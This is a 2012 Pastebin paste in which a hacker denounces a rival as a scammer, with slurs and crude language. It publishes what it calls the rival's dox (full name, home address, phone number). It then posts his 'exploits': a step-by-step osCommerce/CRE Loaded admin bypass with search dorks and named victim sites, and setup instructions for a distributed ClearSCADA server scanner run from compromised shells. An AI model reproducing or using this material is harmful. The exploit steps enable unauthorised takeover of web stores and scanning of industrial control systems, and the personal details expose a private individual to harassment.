Don't like ads? PRO users don't see any ads ;-)

Hex00010 Scammer! (Includes DoX + Exploits)

By: Reck on May 24th, 2012  |  syntax: None  |  size: 6.65 KB  |  hits: 3,790  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. Hello there, world.
  2.  
  3. So, Hex00010 got kicked outta TeamP0isoN for buttfuckin' horny chicks in a Burger King's Bathroom, Just kidding, He got kicked out of TeamP0isoN for continously scamming people.
  4.  
  5.  
  6.  
  7. ---------Hex000101's DoX (http://pastebin.com/zNmFmm59)-------
  8.  
  9. Name: William Premore
  10.  
  11.  
  12. Address: 321 W Forest Pittsburg, KS 66762
  13.  
  14. Tel: +14177936577
  15.  
  16. -----------------------------------------------------------------------------------
  17.  
  18. He's selling exploits, do not BUY from him. He has scammed 20+ people.
  19.  
  20. He said he got 1337 0day exploits for Scada & OsCommerence, and he said he's selling them.
  21.  
  22. Such a pathetic liar, isn't he?
  23.  
  24. Do not BUY shit from him, My friend payed him $250 for the 0day exploits, and he didn't gave him shit, he said he had a shell on a credit-card processing server, he gave him, but it was dead, then my friend started messaging him about it, and he doesn't replies.
  25.  
  26. Here are his so-called '0day' exploits. Enjoy, folks.
  27.  
  28. -----------------------------------------------------------------------------
  29.  
  30. twitter.com/Reckz0r - @Reckz0r - My twitter feed! (Follow for the exposure of cunts)
  31. ----------------------------------------------------------------------------
  32.  
  33. Contact me for the Scada Files for exploiting Scada Websites.
  34.  
  35. His LR: U0164888
  36.  
  37. He's a scammer. Do not BUY shit from him.
  38.  
  39. #FuckScammers
  40. #Pwnage
  41. #OpBangarang
  42.  
  43. *************************************************************************************
  44.  
  45. #1 - OsCommerence (He stole this exploit, Original: http://wasimasif.wordpress.com/2010/05/23/oscommerce-security-exploit-allows-access-to-admin-without-password/)
  46.  
  47. "/*
  48. *
  49. *       TeaMp0ison Run's This Shit Nigga
  50. *
  51. * Found By:  Hex00010  ~  TeaMp0ison ~ Bitches
  52. *
  53. *
  54. */
  55. Using Version CRE Loaded PCI B2B v6.4.1
  56. Using Version CRE Loaded Professional v6.3
  57. Copyright © 2008 osCommerce and The Template Shop
  58. 2006 CRE Loaded Project
  59. Using Version CRE Loaded v6.2
  60. Using Version CRE Loaded PCI Pro v6.4.1
  61. Using Version CRE Loaded PCI Pro v6.4
  62. The best dork -> intitle:"CRE Loaded 6"
  63. Using Version CRE Loaded v6.2 B2B
  64. inurl:"information.php?info_
  65. id="
  66. "intext:Powered by Oscommerce Supercharged by CRE Loaded"
  67.  
  68. ---------------------------------
  69.  
  70. Exploit paths:
  71.  
  72.  
  73. *admin_members.php/login.php
  74.  
  75. *administrators.php/login.php
  76.  
  77. *admin_users.php/login.php
  78.  
  79. ----------------------------
  80.  
  81. Method:
  82.  
  83. for example: www.littleelves.com this our target.
  84.  
  85.  
  86. we go to: www.littleelves.com/admin/
  87.  
  88. you will get http://www.littleelves.com/admin/login.php?osCAdminID=80b8cd584fff0a7bb10374446b35987a
  89.  
  90. Remove  "login.php?osCAdminID=80b8cd584fff0a7bb10374446b35987a" and put "admin_members.php/login.php" instead.
  91.  
  92. after that you will get a page has "TEXT_INFO_HEADING_DEFAULT"
  93.  
  94. Now add this to the URL: http://www.littleelves.com/admin/admin_members.php/login.php?action=new_member
  95.  
  96. not we just added "?action=new_member"
  97.  
  98. after that .. in the same web browser right click then "View source".
  99.  
  100. Copy the source of the current page. and search for word "post".
  101.  
  102. you will find the line will be like this:
  103.  
  104. <form name="newmember" action="http://solarenergyworksstore.com/admin/admin_members.php?action=member_new&page=mID=&osCAdminID=54ebf8c481a5963b75f9e0014503856f" method="post" enctype="multipart/form-data">
  105.  
  106.  
  107. Change it to
  108.  
  109. <form name="newmember" action="http://solarenergyworksstore.com/admin/admin_members.php/login.php?action=member_new&page=mID=&osCAdminID=54ebf8c481a5963b75f9e0014503856f" method="post" enctype="multipart/form-data">
  110.  
  111. Then fill these options:
  112.  
  113.  TEXT_INFO_FIRSTNAME: admin
  114.  TEXT_INFO_LASTNAME: Support
  115.  TEXT_INFO_EMAIL: Put your Email here so you can receive the password.
  116.  TEXT_INFO_GROUP: Top Administrator
  117.  
  118. then click on "Insert".
  119.  
  120. after you clicking Insert. go to your email inbox. you will find a new email "New Password". then you will be able to log in. :)
  121.  
  122. that's the exploit is all about."
  123.  
  124. #2 - Scada
  125.  
  126.  
  127. "/**
  128.  *  ClearScada Exploit   -  Finder - 2012 - DO NOT SHARE
  129.  *  International SCADA Exploit Finder
  130.  *  Status: Public
  131.  *  
  132.  *  Programmed by: Hex00010
  133.  *  
  134.  */
  135.  
  136. Hello everyone
  137.  
  138. Today i present you with the  SCADA Exploit that  can find  Servers   using the  ClearSCADA   product.
  139.  
  140. this is a demonstration proof of concept exploit - this exploit  is  more  informational - Unauthentication
  141. it uses a  client/server.
  142.  
  143. this exploit is in response to the  SCADA EXPLOITS - Hex00010 - Water - Power Plant  located here
  144.  
  145. http://pastebin.com/SjHSWfkV
  146.  
  147.  
  148.  
  149. Server -> reads  5,000 ip's at a  time - once those  5k are up it loads a  new set  of  5k ( also can run multiple ip's if configured through the server correctly for Parallel Data Processing
  150.  
  151. opcode 0 - request a server
  152. opcode 1 - the servers result (0 for invalid, 1 for valid)
  153.  
  154. Opens Port on : 8081
  155.  
  156. Each server  has its own pre-defined  ip list
  157.  
  158.  
  159.  
  160. Server Machine 1:  host  100mb of  ip's
  161. Server Machine 2:  host  600mb of  ip's
  162.  
  163.  
  164.  
  165. Client Machine 1 -> connects to  host 1  - Scans  5k  - ends  - restarts  - if found valid -> print - else - continue - end
  166.  
  167. Client Machine 2 -> connects to  host 1  - Scans  5k  - ends  - restarts  - if found valid -> print - else - continue - end
  168.  
  169. Each machine scans its own subnet
  170.  
  171.  
  172. Supports  Server Clustering  to maximize scanning times
  173.  
  174.  
  175. Supports  SSL  Scanning
  176.  
  177. -----------------------------------------------------------------------------------------------------------
  178.  
  179.  
  180.  
  181.  
  182. Client  ->
  183.  
  184. Reads IP Addresses from the server  and  displays if there valid or not in a file
  185. Reads  Server  Header Information
  186.  
  187.  
  188.  
  189.  
  190.  
  191.  
  192.  
  193. Features:
  194.                        
  195. Server - Pools the clients, Accepts unlimited connections, Queues the server ip list.
  196. Client - Asynchronous processing - Request an ip whilst the other threads are processing. Checks the header for clearscada.
  197. == SETUP ==
  198. In main directory, for the CLIENT
  199. Edit src/ServerConnection.java
  200. Change 127.0.0.1 to the SERVERS ip. Save.
  201. Go back to the parent of src
  202. Make folder bin
  203.  
  204. javac -d bin src/*.java
  205.  
  206. == Copy contents of 'bin' to the shells / servers you want to set up the thread on ==
  207. java -Xmx512m ScadaMain [THREADS]
  208.  
  209. == For the SERVER ==
  210. In the 'Server' directory make bin folder
  211. javac -d bin src/*.java
  212.  
  213. == Copy contents of bin to the main server ==
  214. [sudo ]java -Xmx2048m Server
  215.  
  216.  
  217.  
  218. --------------------------------------------------------------------------------------------------------------
  219.  
  220.  
  221. Run IPGen  to generate  all of the ip addresses  - writes to  ip's.txt"
  222.  
  223. *********************************************************************************
  224.  
  225. Bitches gonna get exposed.
  226. Don't scam.
  227. Be original.
  228.  
  229. twitter.com/Reckz0r
  230. Stay tuned for more bullshit.